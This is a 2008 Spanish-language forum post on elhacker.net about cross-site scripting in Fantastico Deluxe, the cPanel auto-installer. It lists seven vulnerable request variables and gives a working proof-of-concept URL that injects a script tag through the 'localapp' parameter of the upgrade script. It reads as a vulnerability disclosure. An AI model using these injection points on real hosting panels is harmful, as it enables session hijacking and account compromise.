elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Nivel Web / Re: [°] XSS en "Fantastico Deluxe" (Hosting Cpanel) en: 23 Noviembre 2008, 21:02 pm
Hay más variables vulnerables, aquí tenéis una pequeña lista:

Código:
$localapp
$updatedir
$scriptpath_show
$domain_show
$thispage
$thisapp
$currentversion

Se usa así:

Código:
https://dominio.com:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrad e%20to%201.7.4&localapp=%22%3Cscript%3Ealert(%27XSS%27)%3C/script%3E

donde "localapp" es el nombre de variable.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines